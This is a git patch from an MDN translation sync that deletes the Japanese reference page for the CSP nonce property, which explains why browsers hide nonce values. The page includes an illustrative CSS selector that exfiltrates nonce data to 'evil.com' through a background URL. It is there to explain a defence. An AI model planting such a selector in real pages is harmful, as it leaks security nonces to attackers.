From 751e4b6115b0d8f30a147dcba95a3e21445ba4de Mon Sep 17 00:00:00 2001 From: MDN Date: Wed, 7 Jul 2021 00:36:00 +0000 Subject: [CRON] sync translated content --- .../web/api/htmlorforeignelement/nonce/index.html | 62 ---------------------- 1 file changed, 62 deletions(-) delete mode 100644 files/ja/web/api/htmlorforeignelement/nonce/index.html (limited to 'files/ja/web/api/htmlorforeignelement/nonce/index.html') diff --git a/files/ja/web/api/htmlorforeignelement/nonce/index.html b/files/ja/web/api/htmlorforeignelement/nonce/index.html deleted file mode 100644 index cd64acbbb5..0000000000 --- a/files/ja/web/api/htmlorforeignelement/nonce/index.html +++ /dev/null @@ -1,62 +0,0 @@ ---- -title: HTMLOrForeignElement.nonce -slug: Web/API/HTMLOrForeignElement/nonce -tags: - - API - - Content Security Policy - - Experimental - - HTML DOM - - HTMLElement - - Property - - Reference - - nonce -translation_of: Web/API/HTMLOrForeignElement/nonce ---- -
{{APIRef("HTML DOM")}}
- -

nonce は {{DOMxRef("HTMLOrForeignElement")}} ミックスインのプロパティで、特定のフェッチを続行できるかどうかを決定するためにコンテンツセキュリティポリシー (Content Security Policy) で使用される一度だけの暗号化番号を返します。

- -

後の実装では、 nonce 属性を持つ要素はスクリプトにのみ公開します (CSS 属性セレクターのようなサイドチャネルには公開しません)。

- -

- -

ノンス値の受け取り

- -

以前は、すべてのブラウザーが IDL 属性の nonce に対応しているわけではなかったので、回避策としては、代替として getAttribute を使用するようにしていました。

- -
let nonce = script['nonce'] || script.getAttribute('nonce');
- -

しかし、最近のバージョンのブラウザーでは、この方法でアクセスすると nonce の値を隠します (空の文字列が返されます)。 IDL プロパティ (script['nonce']) がノンスにアクセスする唯一の方法となります。

- -

ノンスを隠蔽することは、攻撃者が以下のようなコンテンツ属性からデータを取得できるメカニズムを介してノンスデータを流出させることを防ぐのに役立ちます。

- -
script[nonce~=whatever] {
-  background: url("https://evil.com/nonce?whatever");
-}
- -

仕様書

- - - - - - - - - - - - -
仕様書
{{SpecName('HTML WHATWG','#attr-nonce','nonce')}}
- -

ブラウザーの互換性

- -

{{Compat("api.HTMLElement.nonce")}}

- -

関連情報

- - -- cgit v1.2.3-54-g00ecf